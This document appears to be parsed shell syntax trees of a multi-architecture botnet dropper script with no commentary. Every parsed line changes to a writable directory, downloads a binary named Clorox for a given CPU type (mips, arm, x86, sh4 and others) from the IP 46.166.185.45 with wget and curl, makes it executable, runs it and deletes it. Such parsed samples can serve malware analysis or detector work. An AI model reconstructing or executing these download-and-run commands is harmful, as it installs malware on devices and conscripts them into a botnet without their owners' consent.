ListNode(lineno=2, pos=(12, 203), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 104), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 104), word='http://46.166.185.45/Clorox.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(104, 105)),
  CommandNode(lineno=2, pos=(106, 146), parts=[
    WordNode(lineno=2, pos=(106, 110), word='curl'),
    WordNode(lineno=2, pos=(111, 113), word='-O'),
    WordNode(lineno=2, pos=(114, 146), word='http://46.166.185.45/Clorox.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(146, 147)),
  CommandNode(lineno=2, pos=(148, 168), parts=[
    WordNode(lineno=2, pos=(148, 153), word='chmod'),
    WordNode(lineno=2, pos=(154, 156), word='+x'),
    WordNode(lineno=2, pos=(157, 168), word='Clorox.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(168, 169)),
  CommandNode(lineno=2, pos=(170, 183), parts=[
    WordNode(lineno=2, pos=(170, 183), word='./Clorox.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(183, 184)),
  CommandNode(lineno=2, pos=(185, 203), parts=[
    WordNode(lineno=2, pos=(185, 187), word='rm'),
    WordNode(lineno=2, pos=(188, 191), word='-rf'),
    WordNode(lineno=2, pos=(192, 203), word='Clorox.mips'),
  ]),
])
ListNode(lineno=3, pos=(204, 395), parts=[
  CommandNode(lineno=3, pos=(204, 211), parts=[
    WordNode(lineno=3, pos=(204, 206), word='cd'),
    WordNode(lineno=3, pos=(207, 211), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(212, 214)),
  CommandNode(lineno=3, pos=(215, 226), parts=[
    WordNode(lineno=3, pos=(215, 217), word='cd'),
    WordNode(lineno=3, pos=(218, 226), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(227, 229)),
  CommandNode(lineno=3, pos=(230, 237), parts=[
    WordNode(lineno=3, pos=(230, 232), word='cd'),
    WordNode(lineno=3, pos=(233, 237), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(238, 240)),
  CommandNode(lineno=3, pos=(241, 249), parts=[
    WordNode(lineno=3, pos=(241, 243), word='cd'),
    WordNode(lineno=3, pos=(244, 249), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(250, 252)),
  CommandNode(lineno=3, pos=(253, 257), parts=[
    WordNode(lineno=3, pos=(253, 255), word='cd'),
    WordNode(lineno=3, pos=(256, 257), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(257, 258)),
  CommandNode(lineno=3, pos=(259, 296), parts=[
    WordNode(lineno=3, pos=(259, 263), word='wget'),
    WordNode(lineno=3, pos=(264, 296), word='http://46.166.185.45/Clorox.mpsl'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(296, 297)),
  CommandNode(lineno=3, pos=(298, 338), parts=[
    WordNode(lineno=3, pos=(298, 302), word='curl'),
    WordNode(lineno=3, pos=(303, 305), word='-O'),
    WordNode(lineno=3, pos=(306, 338), word='http://46.166.185.45/Clorox.mpsl'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(338, 339)),
  CommandNode(lineno=3, pos=(340, 360), parts=[
    WordNode(lineno=3, pos=(340, 345), word='chmod'),
    WordNode(lineno=3, pos=(346, 348), word='+x'),
    WordNode(lineno=3, pos=(349, 360), word='Clorox.mpsl'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(360, 361)),
  CommandNode(lineno=3, pos=(362, 375), parts=[
    WordNode(lineno=3, pos=(362, 375), word='./Clorox.mpsl'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(375, 376)),
  CommandNode(lineno=3, pos=(377, 395), parts=[
    WordNode(lineno=3, pos=(377, 379), word='rm'),
    WordNode(lineno=3, pos=(380, 383), word='-rf'),
    WordNode(lineno=3, pos=(384, 395), word='Clorox.mpsl'),
  ]),
])
ListNode(lineno=4, pos=(396, 582), parts=[
  CommandNode(lineno=4, pos=(396, 403), parts=[
    WordNode(lineno=4, pos=(396, 398), word='cd'),
    WordNode(lineno=4, pos=(399, 403), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(404, 406)),
  CommandNode(lineno=4, pos=(407, 418), parts=[
    WordNode(lineno=4, pos=(407, 409), word='cd'),
    WordNode(lineno=4, pos=(410, 418), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(419, 421)),
  CommandNode(lineno=4, pos=(422, 429), parts=[
    WordNode(lineno=4, pos=(422, 424), word='cd'),
    WordNode(lineno=4, pos=(425, 429), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(430, 432)),
  CommandNode(lineno=4, pos=(433, 441), parts=[
    WordNode(lineno=4, pos=(433, 435), word='cd'),
    WordNode(lineno=4, pos=(436, 441), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(442, 444)),
  CommandNode(lineno=4, pos=(445, 449), parts=[
    WordNode(lineno=4, pos=(445, 447), word='cd'),
    WordNode(lineno=4, pos=(448, 449), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(449, 450)),
  CommandNode(lineno=4, pos=(451, 487), parts=[
    WordNode(lineno=4, pos=(451, 455), word='wget'),
    WordNode(lineno=4, pos=(456, 487), word='http://46.166.185.45/Clorox.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(487, 488)),
  CommandNode(lineno=4, pos=(489, 528), parts=[
    WordNode(lineno=4, pos=(489, 493), word='curl'),
    WordNode(lineno=4, pos=(494, 496), word='-O'),
    WordNode(lineno=4, pos=(497, 528), word='http://46.166.185.45/Clorox.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(528, 529)),
  CommandNode(lineno=4, pos=(530, 549), parts=[
    WordNode(lineno=4, pos=(530, 535), word='chmod'),
    WordNode(lineno=4, pos=(536, 538), word='+x'),
    WordNode(lineno=4, pos=(539, 549), word='Clorox.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(549, 550)),
  CommandNode(lineno=4, pos=(551, 563), parts=[
    WordNode(lineno=4, pos=(551, 563), word='./Clorox.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(563, 564)),
  CommandNode(lineno=4, pos=(565, 582), parts=[
    WordNode(lineno=4, pos=(565, 567), word='rm'),
    WordNode(lineno=4, pos=(568, 571), word='-rf'),
    WordNode(lineno=4, pos=(572, 582), word='Clorox.sh4'),
  ]),
])
ListNode(lineno=5, pos=(583, 769), parts=[
  CommandNode(lineno=5, pos=(583, 590), parts=[
    WordNode(lineno=5, pos=(583, 585), word='cd'),
    WordNode(lineno=5, pos=(586, 590), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(591, 593)),
  CommandNode(lineno=5, pos=(594, 605), parts=[
    WordNode(lineno=5, pos=(594, 596), word='cd'),
    WordNode(lineno=5, pos=(597, 605), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(606, 608)),
  CommandNode(lineno=5, pos=(609, 616), parts=[
    WordNode(lineno=5, pos=(609, 611), word='cd'),
    WordNode(lineno=5, pos=(612, 616), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(617, 619)),
  CommandNode(lineno=5, pos=(620, 628), parts=[
    WordNode(lineno=5, pos=(620, 622), word='cd'),
    WordNode(lineno=5, pos=(623, 628), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(629, 631)),
  CommandNode(lineno=5, pos=(632, 636), parts=[
    WordNode(lineno=5, pos=(632, 634), word='cd'),
    WordNode(lineno=5, pos=(635, 636), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(636, 637)),
  CommandNode(lineno=5, pos=(638, 674), parts=[
    WordNode(lineno=5, pos=(638, 642), word='wget'),
    WordNode(lineno=5, pos=(643, 674), word='http://46.166.185.45/Clorox.x86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(674, 675)),
  CommandNode(lineno=5, pos=(676, 715), parts=[
    WordNode(lineno=5, pos=(676, 680), word='curl'),
    WordNode(lineno=5, pos=(681, 683), word='-O'),
    WordNode(lineno=5, pos=(684, 715), word='http://46.166.185.45/Clorox.x86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(715, 716)),
  CommandNode(lineno=5, pos=(717, 736), parts=[
    WordNode(lineno=5, pos=(717, 722), word='chmod'),
    WordNode(lineno=5, pos=(723, 725), word='+x'),
    WordNode(lineno=5, pos=(726, 736), word='Clorox.x86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(736, 737)),
  CommandNode(lineno=5, pos=(738, 750), parts=[
    WordNode(lineno=5, pos=(738, 750), word='./Clorox.x86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(750, 751)),
  CommandNode(lineno=5, pos=(752, 769), parts=[
    WordNode(lineno=5, pos=(752, 754), word='rm'),
    WordNode(lineno=5, pos=(755, 758), word='-rf'),
    WordNode(lineno=5, pos=(759, 769), word='Clorox.x86'),
  ]),
])
ListNode(lineno=6, pos=(770, 956), parts=[
  CommandNode(lineno=6, pos=(770, 777), parts=[
    WordNode(lineno=6, pos=(770, 772), word='cd'),
    WordNode(lineno=6, pos=(773, 777), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(778, 780)),
  CommandNode(lineno=6, pos=(781, 792), parts=[
    WordNode(lineno=6, pos=(781, 783), word='cd'),
    WordNode(lineno=6, pos=(784, 792), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(793, 795)),
  CommandNode(lineno=6, pos=(796, 803), parts=[
    WordNode(lineno=6, pos=(796, 798), word='cd'),
    WordNode(lineno=6, pos=(799, 803), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(804, 806)),
  CommandNode(lineno=6, pos=(807, 815), parts=[
    WordNode(lineno=6, pos=(807, 809), word='cd'),
    WordNode(lineno=6, pos=(810, 815), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(816, 818)),
  CommandNode(lineno=6, pos=(819, 823), parts=[
    WordNode(lineno=6, pos=(819, 821), word='cd'),
    WordNode(lineno=6, pos=(822, 823), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(823, 824)),
  CommandNode(lineno=6, pos=(825, 861), parts=[
    WordNode(lineno=6, pos=(825, 829), word='wget'),
    WordNode(lineno=6, pos=(830, 861), word='http://46.166.185.45/Clorox.arm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(861, 862)),
  CommandNode(lineno=6, pos=(863, 902), parts=[
    WordNode(lineno=6, pos=(863, 867), word='curl'),
    WordNode(lineno=6, pos=(868, 870), word='-O'),
    WordNode(lineno=6, pos=(871, 902), word='http://46.166.185.45/Clorox.arm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(902, 903)),
  CommandNode(lineno=6, pos=(904, 923), parts=[
    WordNode(lineno=6, pos=(904, 909), word='chmod'),
    WordNode(lineno=6, pos=(910, 912), word='+x'),
    WordNode(lineno=6, pos=(913, 923), word='Clorox.arm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(923, 924)),
  CommandNode(lineno=6, pos=(925, 937), parts=[
    WordNode(lineno=6, pos=(925, 937), word='./Clorox.arm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(937, 938)),
  CommandNode(lineno=6, pos=(939, 956), parts=[
    WordNode(lineno=6, pos=(939, 941), word='rm'),
    WordNode(lineno=6, pos=(942, 945), word='-rf'),
    WordNode(lineno=6, pos=(946, 956), word='Clorox.arm'),
  ]),
])
ListNode(lineno=7, pos=(957, 1143), parts=[
  CommandNode(lineno=7, pos=(957, 964), parts=[
    WordNode(lineno=7, pos=(957, 959), word='cd'),
    WordNode(lineno=7, pos=(960, 964), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(965, 967)),
  CommandNode(lineno=7, pos=(968, 979), parts=[
    WordNode(lineno=7, pos=(968, 970), word='cd'),
    WordNode(lineno=7, pos=(971, 979), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(980, 982)),
  CommandNode(lineno=7, pos=(983, 990), parts=[
    WordNode(lineno=7, pos=(983, 985), word='cd'),
    WordNode(lineno=7, pos=(986, 990), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(991, 993)),
  CommandNode(lineno=7, pos=(994, 1002), parts=[
    WordNode(lineno=7, pos=(994, 996), word='cd'),
    WordNode(lineno=7, pos=(997, 1002), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1003, 1005)),
  CommandNode(lineno=7, pos=(1006, 1010), parts=[
    WordNode(lineno=7, pos=(1006, 1008), word='cd'),
    WordNode(lineno=7, pos=(1009, 1010), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1010, 1011)),
  CommandNode(lineno=7, pos=(1012, 1048), parts=[
    WordNode(lineno=7, pos=(1012, 1016), word='wget'),
    WordNode(lineno=7, pos=(1017, 1048), word='http://46.166.185.45/Clorox.pcc'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1048, 1049)),
  CommandNode(lineno=7, pos=(1050, 1089), parts=[
    WordNode(lineno=7, pos=(1050, 1054), word='curl'),
    WordNode(lineno=7, pos=(1055, 1057), word='-O'),
    WordNode(lineno=7, pos=(1058, 1089), word='http://46.166.185.45/Clorox.pcc'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1089, 1090)),
  CommandNode(lineno=7, pos=(1091, 1110), parts=[
    WordNode(lineno=7, pos=(1091, 1096), word='chmod'),
    WordNode(lineno=7, pos=(1097, 1099), word='+x'),
    WordNode(lineno=7, pos=(1100, 1110), word='Clorox.pcc'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1110, 1111)),
  CommandNode(lineno=7, pos=(1112, 1124), parts=[
    WordNode(lineno=7, pos=(1112, 1124), word='./Clorox.pcc'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1124, 1125)),
  CommandNode(lineno=7, pos=(1126, 1143), parts=[
    WordNode(lineno=7, pos=(1126, 1128), word='rm'),
    WordNode(lineno=7, pos=(1129, 1132), word='-rf'),
    WordNode(lineno=7, pos=(1133, 1143), word='Clorox.pcc'),
  ]),
])
ListNode(lineno=8, pos=(1144, 1335), parts=[
  CommandNode(lineno=8, pos=(1144, 1151), parts=[
    WordNode(lineno=8, pos=(1144, 1146), word='cd'),
    WordNode(lineno=8, pos=(1147, 1151), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1152, 1154)),
  CommandNode(lineno=8, pos=(1155, 1166), parts=[
    WordNode(lineno=8, pos=(1155, 1157), word='cd'),
    WordNode(lineno=8, pos=(1158, 1166), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1167, 1169)),
  CommandNode(lineno=8, pos=(1170, 1177), parts=[
    WordNode(lineno=8, pos=(1170, 1172), word='cd'),
    WordNode(lineno=8, pos=(1173, 1177), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1178, 1180)),
  CommandNode(lineno=8, pos=(1181, 1189), parts=[
    WordNode(lineno=8, pos=(1181, 1183), word='cd'),
    WordNode(lineno=8, pos=(1184, 1189), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1190, 1192)),
  CommandNode(lineno=8, pos=(1193, 1197), parts=[
    WordNode(lineno=8, pos=(1193, 1195), word='cd'),
    WordNode(lineno=8, pos=(1196, 1197), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1197, 1198)),
  CommandNode(lineno=8, pos=(1199, 1236), parts=[
    WordNode(lineno=8, pos=(1199, 1203), word='wget'),
    WordNode(lineno=8, pos=(1204, 1236), word='http://46.166.185.45/Clorox.i686'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1236, 1237)),
  CommandNode(lineno=8, pos=(1238, 1278), parts=[
    WordNode(lineno=8, pos=(1238, 1242), word='curl'),
    WordNode(lineno=8, pos=(1243, 1245), word='-O'),
    WordNode(lineno=8, pos=(1246, 1278), word='http://46.166.185.45/Clorox.i686'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1278, 1279)),
  CommandNode(lineno=8, pos=(1280, 1300), parts=[
    WordNode(lineno=8, pos=(1280, 1285), word='chmod'),
    WordNode(lineno=8, pos=(1286, 1288), word='+x'),
    WordNode(lineno=8, pos=(1289, 1300), word='Clorox.i686'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1300, 1301)),
  CommandNode(lineno=8, pos=(1302, 1315), parts=[
    WordNode(lineno=8, pos=(1302, 1315), word='./Clorox.i686'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1315, 1316)),
  CommandNode(lineno=8, pos=(1317, 1335), parts=[
    WordNode(lineno=8, pos=(1317, 1319), word='rm'),
    WordNode(lineno=8, pos=(1320, 1323), word='-rf'),
    WordNode(lineno=8, pos=(1324, 1335), word='Clorox.i686'),
  ]),
])
ListNode(lineno=9, pos=(1336, 1527), parts=[
  CommandNode(lineno=9, pos=(1336, 1343), parts=[
    WordNode(lineno=9, pos=(1336, 1338), word='cd'),
    WordNode(lineno=9, pos=(1339, 1343), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1344, 1346)),
  CommandNode(lineno=9, pos=(1347, 1358), parts=[
    WordNode(lineno=9, pos=(1347, 1349), word='cd'),
    WordNode(lineno=9, pos=(1350, 1358), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1359, 1361)),
  CommandNode(lineno=9, pos=(1362, 1369), parts=[
    WordNode(lineno=9, pos=(1362, 1364), word='cd'),
    WordNode(lineno=9, pos=(1365, 1369), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1370, 1372)),
  CommandNode(lineno=9, pos=(1373, 1381), parts=[
    WordNode(lineno=9, pos=(1373, 1375), word='cd'),
    WordNode(lineno=9, pos=(1376, 1381), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1382, 1384)),
  CommandNode(lineno=9, pos=(1385, 1389), parts=[
    WordNode(lineno=9, pos=(1385, 1387), word='cd'),
    WordNode(lineno=9, pos=(1388, 1389), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1389, 1390)),
  CommandNode(lineno=9, pos=(1391, 1428), parts=[
    WordNode(lineno=9, pos=(1391, 1395), word='wget'),
    WordNode(lineno=9, pos=(1396, 1428), word='http://46.166.185.45/Clorox.i586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1428, 1429)),
  CommandNode(lineno=9, pos=(1430, 1470), parts=[
    WordNode(lineno=9, pos=(1430, 1434), word='curl'),
    WordNode(lineno=9, pos=(1435, 1437), word='-O'),
    WordNode(lineno=9, pos=(1438, 1470), word='http://46.166.185.45/Clorox.i586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1470, 1471)),
  CommandNode(lineno=9, pos=(1472, 1492), parts=[
    WordNode(lineno=9, pos=(1472, 1477), word='chmod'),
    WordNode(lineno=9, pos=(1478, 1480), word='+x'),
    WordNode(lineno=9, pos=(1481, 1492), word='Clorox.i586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1492, 1493)),
  CommandNode(lineno=9, pos=(1494, 1507), parts=[
    WordNode(lineno=9, pos=(1494, 1507), word='./Clorox.i586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1507, 1508)),
  CommandNode(lineno=9, pos=(1509, 1527), parts=[
    WordNode(lineno=9, pos=(1509, 1511), word='rm'),
    WordNode(lineno=9, pos=(1512, 1515), word='-rf'),
    WordNode(lineno=9, pos=(1516, 1527), word='Clorox.i586'),
  ]),
])
ListNode(lineno=10, pos=(1528, 1719), parts=[
  CommandNode(lineno=10, pos=(1528, 1535), parts=[
    WordNode(lineno=10, pos=(1528, 1530), word='cd'),
    WordNode(lineno=10, pos=(1531, 1535), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1536, 1538)),
  CommandNode(lineno=10, pos=(1539, 1550), parts=[
    WordNode(lineno=10, pos=(1539, 1541), word='cd'),
    WordNode(lineno=10, pos=(1542, 1550), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1551, 1553)),
  CommandNode(lineno=10, pos=(1554, 1561), parts=[
    WordNode(lineno=10, pos=(1554, 1556), word='cd'),
    WordNode(lineno=10, pos=(1557, 1561), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1562, 1564)),
  CommandNode(lineno=10, pos=(1565, 1573), parts=[
    WordNode(lineno=10, pos=(1565, 1567), word='cd'),
    WordNode(lineno=10, pos=(1568, 1573), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1574, 1576)),
  CommandNode(lineno=10, pos=(1577, 1581), parts=[
    WordNode(lineno=10, pos=(1577, 1579), word='cd'),
    WordNode(lineno=10, pos=(1580, 1581), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1581, 1582)),
  CommandNode(lineno=10, pos=(1583, 1620), parts=[
    WordNode(lineno=10, pos=(1583, 1587), word='wget'),
    WordNode(lineno=10, pos=(1588, 1620), word='http://46.166.185.45/Clorox.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1620, 1621)),
  CommandNode(lineno=10, pos=(1622, 1662), parts=[
    WordNode(lineno=10, pos=(1622, 1626), word='curl'),
    WordNode(lineno=10, pos=(1627, 1629), word='-O'),
    WordNode(lineno=10, pos=(1630, 1662), word='http://46.166.185.45/Clorox.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1662, 1663)),
  CommandNode(lineno=10, pos=(1664, 1684), parts=[
    WordNode(lineno=10, pos=(1664, 1669), word='chmod'),
    WordNode(lineno=10, pos=(1670, 1672), word='+x'),
    WordNode(lineno=10, pos=(1673, 1684), word='Clorox.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1684, 1685)),
  CommandNode(lineno=10, pos=(1686, 1699), parts=[
    WordNode(lineno=10, pos=(1686, 1699), word='./Clorox.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1699, 1700)),
  CommandNode(lineno=10, pos=(1701, 1719), parts=[
    WordNode(lineno=10, pos=(1701, 1703), word='rm'),
    WordNode(lineno=10, pos=(1704, 1707), word='-rf'),
    WordNode(lineno=10, pos=(1708, 1719), word='Clorox.m68k'),
  ]),
])
ListNode(lineno=11, pos=(1720, 1906), parts=[
  CommandNode(lineno=11, pos=(1720, 1727), parts=[
    WordNode(lineno=11, pos=(1720, 1722), word='cd'),
    WordNode(lineno=11, pos=(1723, 1727), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1728, 1730)),
  CommandNode(lineno=11, pos=(1731, 1742), parts=[
    WordNode(lineno=11, pos=(1731, 1733), word='cd'),
    WordNode(lineno=11, pos=(1734, 1742), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1743, 1745)),
  CommandNode(lineno=11, pos=(1746, 1753), parts=[
    WordNode(lineno=11, pos=(1746, 1748), word='cd'),
    WordNode(lineno=11, pos=(1749, 1753), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1754, 1756)),
  CommandNode(lineno=11, pos=(1757, 1765), parts=[
    WordNode(lineno=11, pos=(1757, 1759), word='cd'),
    WordNode(lineno=11, pos=(1760, 1765), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1766, 1768)),
  CommandNode(lineno=11, pos=(1769, 1773), parts=[
    WordNode(lineno=11, pos=(1769, 1771), word='cd'),
    WordNode(lineno=11, pos=(1772, 1773), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1773, 1774)),
  CommandNode(lineno=11, pos=(1775, 1811), parts=[
    WordNode(lineno=11, pos=(1775, 1779), word='wget'),
    WordNode(lineno=11, pos=(1780, 1811), word='http://46.166.185.45/Clorox.spc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1811, 1812)),
  CommandNode(lineno=11, pos=(1813, 1852), parts=[
    WordNode(lineno=11, pos=(1813, 1817), word='curl'),
    WordNode(lineno=11, pos=(1818, 1820), word='-O'),
    WordNode(lineno=11, pos=(1821, 1852), word='http://46.166.185.45/Clorox.spc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1852, 1853)),
  CommandNode(lineno=11, pos=(1854, 1873), parts=[
    WordNode(lineno=11, pos=(1854, 1859), word='chmod'),
    WordNode(lineno=11, pos=(1860, 1862), word='+x'),
    WordNode(lineno=11, pos=(1863, 1873), word='Clorox.spc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1873, 1874)),
  CommandNode(lineno=11, pos=(1875, 1887), parts=[
    WordNode(lineno=11, pos=(1875, 1887), word='./Clorox.spc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1887, 1888)),
  CommandNode(lineno=11, pos=(1889, 1906), parts=[
    WordNode(lineno=11, pos=(1889, 1891), word='rm'),
    WordNode(lineno=11, pos=(1892, 1895), word='-rf'),
    WordNode(lineno=11, pos=(1896, 1906), word='Clorox.spc'),
  ]),
])
ListNode(lineno=12, pos=(1907, 2093), parts=[
  CommandNode(lineno=12, pos=(1907, 1914), parts=[
    WordNode(lineno=12, pos=(1907, 1909), word='cd'),
    WordNode(lineno=12, pos=(1910, 1914), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1915, 1917)),
  CommandNode(lineno=12, pos=(1918, 1929), parts=[
    WordNode(lineno=12, pos=(1918, 1920), word='cd'),
    WordNode(lineno=12, pos=(1921, 1929), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1930, 1932)),
  CommandNode(lineno=12, pos=(1933, 1940), parts=[
    WordNode(lineno=12, pos=(1933, 1935), word='cd'),
    WordNode(lineno=12, pos=(1936, 1940), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1941, 1943)),
  CommandNode(lineno=12, pos=(1944, 1952), parts=[
    WordNode(lineno=12, pos=(1944, 1946), word='cd'),
    WordNode(lineno=12, pos=(1947, 1952), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1953, 1955)),
  CommandNode(lineno=12, pos=(1956, 1960), parts=[
    WordNode(lineno=12, pos=(1956, 1958), word='cd'),
    WordNode(lineno=12, pos=(1959, 1960), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1960, 1961)),
  CommandNode(lineno=12, pos=(1962, 1998), parts=[
    WordNode(lineno=12, pos=(1962, 1966), word='wget'),
    WordNode(lineno=12, pos=(1967, 1998), word='http://46.166.185.45/Clorox.pcc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1998, 1999)),
  CommandNode(lineno=12, pos=(2000, 2039), parts=[
    WordNode(lineno=12, pos=(2000, 2004), word='curl'),
    WordNode(lineno=12, pos=(2005, 2007), word='-O'),
    WordNode(lineno=12, pos=(2008, 2039), word='http://46.166.185.45/Clorox.pcc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(2039, 2040)),
  CommandNode(lineno=12, pos=(2041, 2060), parts=[
    WordNode(lineno=12, pos=(2041, 2046), word='chmod'),
    WordNode(lineno=12, pos=(2047, 2049), word='+x'),
    WordNode(lineno=12, pos=(2050, 2060), word='Clorox.pcc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(2060, 2061)),
  CommandNode(lineno=12, pos=(2062, 2074), parts=[
    WordNode(lineno=12, pos=(2062, 2074), word='./Clorox.pcc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(2074, 2075)),
  CommandNode(lineno=12, pos=(2076, 2093), parts=[
    WordNode(lineno=12, pos=(2076, 2078), word='rm'),
    WordNode(lineno=12, pos=(2079, 2082), word='-rf'),
    WordNode(lineno=12, pos=(2083, 2093), word='Clorox.pcc'),
  ]),
])
